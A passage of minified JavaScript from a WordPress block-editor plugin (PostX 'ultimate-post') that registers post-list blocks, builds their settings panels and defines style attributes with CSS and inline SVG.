t:0,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreIcon",default:" "},{key:"readMoreTypo",default:{openTypography:1,size:{lg:12,unit:"px"},height:{lg:"",unit:"px"},spacing:{lg:"",unit:"px"},transform:"uppercase",weight:"500",decoration:"underline",family:""}},{key:"readMoreColor",default:"var(--postx_preset_Contrast_1_color)"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"var(--postx_preset_Base_3_color)"}},{key:"readMoreHoverColor",default:"var(--postx_preset_Contrast_3_color)"},{key:"readMoreSacing",default:{lg:{top:20,bottom:"",left:"",right:"",unit:"px"},xs:{top:15,unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)({})}},99038:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(67594),n=l(42510),r=l(39220),s=l(95596);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-List-2/","block_docs"),p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-list-2.svg"}),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postlist2.svg"}},transforms:{to:[...(0,i.Z)("ultimate-post/post-list-2","listBlocks")]},edit:n.Z,save:()=>null})},38602:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(23890),n=l(49491),r=l(53105),s=l(29236),p=l(53508),c=l(46896),u=l(71411),d=l(93985),m=l(8152),g=l(76005),y=l(99838),b=l(31760),v=l(73151),h=l(69735),f=l(2963),k=l(39349),w=l(87025),x=l(40138);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=S(null),[l,M]=E(w.Ti),[A,H]=E(null),{setAttributes:N,name:j,clientId:Z,className:O,isSelected:R,context:D,attributes:z,attributes:{blockId:F,previewImg:W,readMoreIcon:V,imgCrop:G,excerptLimit:q,showFullExcerpt:$,columns:K,metaStyle:J,metaShow:Y,catShow:X,readMore:Q,readMoreText:ee,showImage:te,metaSeparator:le,titleShow:oe,catStyle:ae,catPosition:ie,titlePosition:ne,excerptShow:re,imgAnimation:se,imgOverlayType:pe,imgOverlay:ce,metaList:ue,varticalAlign:de,imgFlip:me,metaPosition:ge,layout:ye,customCatColor:be,onlyCatColor:ve,contentTag:he,titleTag:fe,showSeoMeta:ke,titleLength:we,metaMinText:xe,metaAuthorPrefix:Te,titleStyle:_e,metaDateFormat:Ce,authorLink:Ee,fallbackEnable:Se,vidIconEnable:Pe,notFoundMessage:Le,dcEnabled:Ie,dcFields:Be,advanceId:Ue,paginationShow:Me,paginationAjax:Ae,headingShow:He,filterShow:Ne,paginationType:je,navPosition:Ze,paginationNav:Oe,loadMoreText:Re,paginationText:De,V4_1_0_CompCheck:{runComp:ze},currentPostId:Fe}}=e;function We(e){M({...l,selectedDC:e})}function Ve(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ge(e){M({...l,section:{...w.ZQ,[e]:!0}}),(0,w.Rt)(e),(0,w.ob)(e),H("setting")}function qe(e){M((t=>({...t,toolbarSettings:e}))),(0,w.os)(e)}function $e(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,a.Ld)(z)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}C((()=>{(0,w.oA)(),$e()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,a.qi)(N,l,Fe,Z),(0,v.h)(e),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[F]),C((()=>{const e=t.current;(0,h.o6)()&&0===z.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,z)&&($e(),t.current=z),e.isSelected!==R&&R&&(0,w.gT)(Ge,qe)):t.current=z}),[z]);const Ke={settingTab:A,setSettingTab:H,setAttributes:N,name:j,attributes:z,setSection:Ge,section:l.section,clientId:Z,context:D,setSelectedDc:We,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){We(e),qe("dc_group")}};let Je;F&&(Je=(0,y.Kh)(z,"ultimate-post/post-list-3",F,(0,a.k0)()));const Ye=_({...Ue&&{id:Ue},className:`ultp-block-${F} ${O}`,onClick:e=>{e.stopPropagation(),Ge("general"),qe("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:Ke,selected:l.toolbarSettings}),(0,o.createElement)(b.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",include:[{position:1,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}}],exclude:["spaceSep","wrapOuterPadding","wrapMargin"]},{type:"layout",block:"post-list-3",key:"layout",options:[{img:"assets/img/layouts/pl3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pl3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}]},{type:"feat_toggle",label:__("Post List Features","ultimate-post"),new:a.KE,[ze?"exclude":"dep"]:a.N2}],store:Ke}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:Ke})),(0,o.createElement)("div",Ye,Je&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Je}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},(He||Ne||Me)&&(0,o.createElement)(r.m,{attributes:z,setAttributes:N,onClick:()=>{Ge("heading"),qe("heading")},setSection:Ge,setToolbarSettings:qe}),function(){const t=`${he}`,a=(e,t)=>(0,h.o6)()&&Ie&&(0,o.createElement)(k.Z,{idx:e,postId:t,fields:Be,settingsOnClick:(e,t)=>{e?.stopPropagation(),qe(t)},selectedDC:l.selectedDC,setSelectedDc:We,setAttributes:N,dcFields:Be});return W&&!R?(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:W}):(C((()=>{R&&W&&N({previewImg:""})}),[e?.isSelected]),l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading….","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-block-row ultp-block-column-${K.lg} ultp-block-content-${de} ultp-block-content-${me} ultp-${ye}`},l.postsList.map(((e,l)=>{const r=JSON.parse(ue.replaceAll("u0022",'"'));return(0,o.createElement)(t,{key:l,className:`ultp-block-item ultp-block-media post-id-${e.ID}`},(0,o.createElement)("div",{className:"ultp-block-content-wrap"},(0,o.createElement)(s._g,{imgOverlay:ce,imgOverlayType:pe,imgAnimation:se,post:e,fallbackEnable:Se,vidIconEnable:Pe,showImage:te,idx:l,imgCrop:G,onClick:()=>{Ge("image"),qe("image")},Video:Pe&&e.has_video?(0,o.createElement)(s.nk,{onClick:()=>{Ge("video"),qe("video")}}):null,Category:"aboveTitle"!=ie?(0,o.createElement)("div",{className:"ultp-category-img-grid"},(0,o.createElement)(i.Z,{post:e,catShow:X,catStyle:ae,catPosition:ie,customCatColor:be,onlyCatColor:ve,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}})):null}),(0,o.createElement)("div",{className:"ultp-block-content"},a(7,e.ID),"aboveTitle"==ie&&(0,o.createElement)(i.Z,{post:e,catShow:X,catStyle:ae,catPosition:ie,customCatColor:be,onlyCatColor:ve,onClick:e=>{Ge("taxonomy-/-category"),qe("cat")}}),a(6,e.ID),e.title&&oe&&1==ne&&(0,o.createElement)(g.Z,{title:e.title,headingTag:fe,titleLength:we,titleStyle:_e,onClick:e=>{Ge("title"),qe("title")}}),a(5,e.ID),Y&&"top"==ge&&(0,o.createElement)(c.Z,{meta:r,post:e,metaSeparator:le,metaStyle:J,metaMinText:xe,metaAuthorPrefix:Te,metaDateFormat:Ce,authorLink:Ee,onClick:e=>{Ge("meta"),qe("meta")}}),a(4,e.ID),e.title&&oe&&0==ne&&(0,o.createElement)(g.Z,{title:e.title,headingTag:fe,titleLength:we,titleStyle:_e,onClick:e=>{Ge("title"),qe("title")}}),a(3,e.ID),re&&(0,o.createElement)(n.Z,{excerpt:e.excerpt,excerpt_full:e.excerpt_full,seo_meta:e.seo_meta,excerptLimit:q,showFullExcerpt:$,showSeoMeta:ke,onClick:e=>{Ge("excerpt"),qe("excerpt")}}),a(2,e.ID),Q&&(0,o.createElement)(m.Z,{readMoreText:ee,readMoreIcon:V,titleLabel:e.title,onClick:()=>{Ge("read-more"),qe("read-more")}}),a(1,e.ID),Y&&"bottom"==ge&&(0,o.createElement)(c.Z,{meta:r,post:e,metaSeparator:le,metaStyle:J,metaMinText:xe,metaAuthorPrefix:Te,metaDateFormat:Ce,authorLink:Ee,onClick:e=>{Ge("meta"),qe("meta")}}),a(0,e.ID),(0,h.o6)()&&Ie&&(0,o.createElement)(f.Z,{dcFields:Be,setAttributes:N,startOnboarding:Ve}))))}))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:Le}))}(),Me&&"loadMore"==je&&(0,o.createElement)(p.Z,{loadMoreText:Re,onClick:e=>{Ge("pagination"),qe("pagination")}}),Me&&"navigation"==je&&"topRight"!=Ze&&(0,o.createElement)(u.Z,{onClick:()=>{Ge("pagination"),qe("pagination")}}),Me&&"pagination"==je&&(0,o.createElement)(d.Z,{paginationNav:Oe,paginationAjax:Ae,paginationText:De,onClick:e=>{Ge("pagination"),qe("pagination")}}))))}},40138:(e,t,l)=>{"use strict";l.d(t,{FP:()=>v,PR:()=>y,ZP:()=>b});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(87282),p=l(92637),c=l(43581),u=l(69735),d=l(82473),m=l(87025);const{__}=wp.i18n,{useEffect:g}=wp.element,y=8,b=e=>{const{store:t}=e,{layout:l,queryType:n,advFilterEnable:r,advPaginationEnable:u,V4_1_0_CompCheck:{runComp:d}}=t.attributes,{context:y,section:b,settingTab:v,setSettingTab:h}=t;return g((()=>{(0,m.CH)(y,r,t,u)}),[r,u,t.clientId]),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(c.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6838",store:t}),(0,o.createElement)(p.Sections,{settingTab:v,setSettingTab:h},(0,o.createElement)(p.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:t}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Include","ultimate-post"),include:s.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("Exclude","ultimate-post"),include:s.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:t,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(p.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{store:t,initialOpen:!0,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-list-3",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/pl3/l1.png",label:__("Layout 1","ultimate-post"),value:"layout1",pro:!1},{img:"assets/img/layouts/pl3/l2.png",label:__("Layout 2","ultimate-post"),value:"layout2",pro:!0},{img:"assets/img/layouts/pl3/l3.png",label:__("Layout 3","ultimate-post"),value:"layout3",pro:!0},{img:"assets/img/layouts/pl3/l4.png",label:__("Layout 4","ultimate-post"),value:"layout4",pro:!0},{img:"assets/img/layouts/pl3/l5.png",label:__("Layout 5","ultimate-post"),value:"layout5",pro:!0}],variation:{layout1:{imgWidth:{lg:"45",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"15",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:0},contentWrapInnerPadding:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"},xs:{top:"",bottom:"",left:"",right:"",unit:"px"}}},layout2:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"15",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:0},contentWrapInnerPadding:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"},xs:{top:"",bottom:"",left:"",right:"",unit:"px"}}},layout3:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"0",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"40",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"21",bottom:"21",left:"21",right:"21",unit:"px"}}},layout4:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"15",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:0},contentWrapInnerPadding:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"},xs:{top:"",bottom:"",left:"",right:"",unit:"px"}}},layout5:{imgWidth:{lg:"50",ulg:"%"},catSacing:{lg:{top:"0",bottom:"10",unit:"px"},xs:{top:"0",bottom:"5",unit:"px"}},contentWrapBorder:{width:{top:"0.5",right:"0.5",bottom:"0.5",left:"0.5",unit:"px"},type:"solid",color:"#969696",openBorder:1},contentWrapInnerPadding:{lg:{top:"40",bottom:"40",left:"30",right:"30",unit:"px"},xs:{top:"21",bottom:"21",left:"21",right:"21",unit:"px"}}}}}},{position:3,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row Gap","ultimate-post")}},{position:6,data:{type:"toggle",key:"imgFlip",label:__("Image Flip","ultimate-post")}},{position:7,data:{type:"toggle",key:"mobileImageTop",label:__("Stack on Mobile","ultimate-post")}},{position:8,data:{type:"tag",key:"varticalAlign",label:__("Vertical Align","ultimate-post"),options:[{value:"top",label:__("Top","ultimate-post")},{value:"middle",label:__("Middle","ultimate-post")},{value:"bottom",label:__("Bottom","ultimate-post")}]}}]}),(0,o.createElement)(a.VH,{isTab:!0,store:t,depend:"titleShow",initialOpen:b.title,exclude:["titleBackground"]}),(0,o.createElement)(a.Hn,{isTab:!0,store:t,initialOpen:b.image,include:[{position:3,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imgMargin","imgCropSmall"],hrIdx:[{tab:"settings",hr:[2,10]},{tab:"style",hr:[4]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:t,depend:"metaShow",initialOpen:b.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[4]},{tab:"style",hr:[7]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:b["taxonomy-/-category"],depend:"catShow",store:t,hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:b.excerpt,store:t,hrIdx:[3,6]}),(0,o.createElement)(a.oY,{isTab:!0,store:t,initialOpen:b["read-more"],depend:"readMore"}),(0,o.createElement)(a.rS,{initialOpen:b.video,depend:"vidIconEnable",store:t}),(0,o.createElement)(a.Yp,{depend:"separatorShow",exclude:["septSpace"],store:t}),(0,o.createElement)(a.O2,{store:t,exclude:["contenWraptWidth","contenWraptHeight"]}),"layout2"===l&&(0,o.createElement)(a.wT,{store:t}),!d&&(0,o.createElement)(i.Z,{open:b.filter||b.pagination||b.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:t,initialOpen:b.heading,depend:"headingShow"}),"posts"!=n&&"customPosts"!=n&&(0,o.createElement)(a.B0,{isTab:!0,store:t,initialOpen:b.filter,depend:"filterShow",hrIdx:[{tab:"settings",hr:[5]},{tab:"style",hr:[4,9]}]}),(0,o.createElement)(a.ng,{isTab:!0,initialOpen:b.pagination,depend:"paginationShow",store:t}))),(0,o.createElement)(p.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:t,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:t}),(0,o.createElement)(a.iv,{store:t}))),(0,a.dH)())};function v({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,showImage:s,titleShow:p,catPosition:c,titlePosition:m,excerptShow:g,readMore:y,metaPosition:b,layout:v,fallbackEnable:h,catShow:f}=t.attributes,k=[i&&"bottom"==b,y,g,p&&0==m,i&&"top"==b,p&&1==m,f&&"aboveTitle"==c,h&&s];if((0,u.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(d.Z,{store:t,selected:e,layoutContext:k});switch(e){case"filter":return l?null:(0,o.createElement)(r.Z,{text:"Filter"},(0,o.createElement)(a.sT,{store:t,attrKey:"fliterTypo",label:__("Filter Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.Eo)({include:["fliterSpacing","fliterPadding"],exclude:"__all",title:__("Filter Spacing","ultimate-post")}),store:t,label:__("Filter Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Filter Settings","ultimate-post"),styleTitle:__("Filter Style","ultimate-post"),settingsKeys:a.Df,styleKeys:a.YF,oArgs:a.rx,exStyle:["fliterTypo","fliterSpacing","fliterPadding"]}));case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"pagination":return l?null:(0,o.createElement)(r.Z,{text:"Pagination"},(0,o.createElement)(a.sT,{store:t,attrKey:"pagiTypo",label:__("Pagination Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.DU)({include:["pagiMargin","pagiPadding"],exclude:"__all",title:__("Pagination Spacing","ultimate-post")}),store:t,label:__("Pagination Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Pagination Settings","ultimate-post"),styleTitle:__("Pagination Style","ultimate-post"),settingsKeys:a.V2,styleKeys:a.xd,oArgs:a.YZ,exStyle:["pagiTypo","pagiMargin","pagiPadding"]}));case"video":return(0,o.createElement)(r.Z,{text:"Video"},(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.q7)({include:a.JA,exclude:"__all",title:__("Video Icon Color","ultimate-post")}),store:t,label:__("Video Icon Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.q7)({exclude:a.JA}),store:t,label:__("Video Settings","ultimate-post")}));case"title":return(0,o.createElement)(r.Z,{text:"Title"},(0,o.createElement)(n.Z,{buttonContent:a.tj,include:(0,a.Wf)({include:["titleTypo"],exclude:"__all",title:__("Title Typography","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.Wf)({include:["titleColor","titleHoverColor"],exclude:"__all",title:__("Title Color","ultimate-post")}),store:t,label:__("Title Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.Wf)({exclude:["titleBackground","titleTypo","titleColor","titleHoverColor"],title:__("Title Settings","ultimate-post")}),store:t,label:__("Title Settings","ultimate-post")}));case"excerpt":return(0,o.createElement)(r.Z,{text:"Excerpt"},(0,o.createElement)(a.sT,{store:t,attrKey:"excerptTypo",label:__("Excerpt Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.gA,include:(0,a.BO)({include:["excerptColor"],exclude:"__all",title:__("Excerpt Color","ultimate-post")}),store:t,label:__("Excerpt Color","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HU,include:(0,a.BO)({exclude:["excerptTypo","excerptColor"],title:__("Excerpt Settings","ultimate-post")}),store:t,label:__("Excerpt Settings","ultimate-post")}));case"meta":return(0,o.createElement)(r.Z,{text:"Meta"},(0,o.createElement)(a.sT,{store:t,attrKey:"metaTypo",label:__("Meta Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.cr)({include:["metaSpacing","metaMargin","metaPadding"],exclude:"__all",title:__("Meta Spacing","ultimate-post")}),store:t,label:__("Meta Spacing","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.Cz,include:(0,a.cr)({include:a._y,exclude:"__all",title:__("Meta Texts","ultimate-post")}),store:t,label:__("Meta Texts","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Meta Settings","ultimate-post"),styleTitle:__("Meta Style","ultimate-post"),settingsKeys:a.G7,styleKeys:a.hd,oArgs:a.jK,exSettings:["metaListSmall"],exStyle:["metaTypo","metaMargin","metaPadding","metaSpacing"]}));case"read-more":return(0,o.createElement)(r.Z,{text:"Read More"},(0,o.createElement)(a.sT,{store:t,attrKey:"readMoreTypo",label:__("Read More Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.NJ)({include:["readMoreSacing","readMorePadding"],exclude:"__all",title:__("Read More Spacing","ultimate-post")}),store:t,label:__("Read More Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Read More Settings","ultimate-post"),styleTitle:__("Read More Style","ultimate-post"),settingsKeys:a.qM,styleKeys:a.ad,oArgs:a.e5,exStyle:["readMoreTypo","readMoreSacing","readMorePadding"]}));case"cat":return(0,o.createElement)(r.Z,{text:"Taxonomy/Category"},(0,o.createElement)(a.sT,{store:t,attrKey:"catTypo",label:__("Category Typography","ultimate-post")}),(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.v9)({include:["catSacing","catPadding"],exclude:"__all",title:__("Category Spacing","ultimate-post")}),store:t,label:__("Category Spacing","ultimate-post")}),(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Category Settings","ultimate-post"),styleTitle:__("Category Style","ultimate-post"),settingsKeys:a.eC,styleKeys:a.EK,oArgs:a.op,exStyle:["catTypo","catSacing","catPadding"]}));case"image":return(0,o.createElement)(r.Z,{text:"Image"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Image Settings","ultimate-post"),styleTitle:__("Image Style","ultimate-post"),settingsKeys:a.pj,styleKeys:a.hH,oArgs:a.Po,incSettings:[{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],incStyle:[{position:0,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}],exSettings:["imgCropSmall"],exStyle:["imgMargin"]}));default:return null}}},18490:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(92165),a=l(73151),i=l(51579);const n={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"layout1"},columns:{type:"object",default:{lg:"1"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"30",unit:"px"},style:[{selector:"{{ULTP}} .ultp-block-row { grid-column-gap: {{columnGridGap}}; }"}]},rowSpace:{type:"object",default:{lg:"30"},style:[{depends:[{key:"separatorShow",condition:"!=",value:!0}],selector:"{{ULTP}} .ultp-block-row {row-gap: {{rowSpace}}px; }"},{depends:[{key:"separatorShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-block-item { padding-bottom: {{rowSpace}}px; margin-bottom:{{rowSpace}}px; }"}]},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!0},showImage:{type:"boolean",default:!0},filterShow:{type:"boolean",default:!1,style:[{depends:[{key:"queryType",condition:"!=",value:["posts","customPosts"]}]}]},paginationShow:{type:"boolean",default:!0},contentTag:{type:"string",default:"div"},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Post Found"},titleShow:{type:"boolean",default:!0},titleStyle:{type:"string",default:"none"},titleAnimColor:{type:"string",default:"var(--postx_preset_Contrast_3_color)",style:[{depends:[{key:"titleStyle",condition:"==",value:"style1"}],selector:"{{ULTP}} .ultp-title-style1 a {  cursor: pointer; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.35s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 0px 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style2"}],selector:"{{ULTP}} .ultp-title-style2 a:hover {  border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\"); }"},{depends:[{key:"titleStyle",condition:"==",value:"style3"}],selector:"{{ULTP}} .ultp-title-style3 a {  text-decoration: none; $thetransition: all 1s cubic-bezier(1,.25,0,.75) 0s; position: relative; transition: all 0.35s ease-out; padding-bottom: 3px; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5 c 2.5,0,2.5,-1.5,5,-1.5 s 2.5,1.5,5,1.5' /%3E%3C/svg%3E\");  }"},{depends:[{key:"titleStyle",condition:"==",value:"style4"}],selector:"{{ULTP}} .ultp-title-style4 a { cursor: pointer; font-weight: 600; text-decoration: none; display: inline; padding-bottom: 2px; transition: all 0.3s linear !important; background: linear-gradient( to bottom, {{titleAnimColor}} 0%, {{titleAnimColor}} 98% );  background-size: 100% 2px; background-repeat: no-repeat; background-position: left 100%; }"},{depends:[{key:"titleStyle",condition:"==",value:"style5"}],selector:"{{ULTP}} .ultp-title-style5 a:hover{ text-decoration: none; transition: all 0.35s ease-out; border-bottom:none; padding-bottom: 2px; background-position:0 100%; background-repeat: repeat; background-size:auto; background-image: url(\"data:image/svg+xml;charset=utf8,%3Csvg id='squiggle-link' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' xmlns:ev='http://www.w3.org/2001/xml-events' viewBox='0 0 10 18'%3E%3Cstyle type='text/css'%3E.squiggle%7Banimation:shift .5s linear infinite;%7D@keyframes shift %7Bfrom %7Btransform:translateX(-10px);%7Dto %7Btransform:translateX(0);%7D%7D%3C/style%3E%3Cpath fill='none' stroke='{{titleAnimColor}}' stroke-width='1' class='squiggle' d='M0,17.5 c 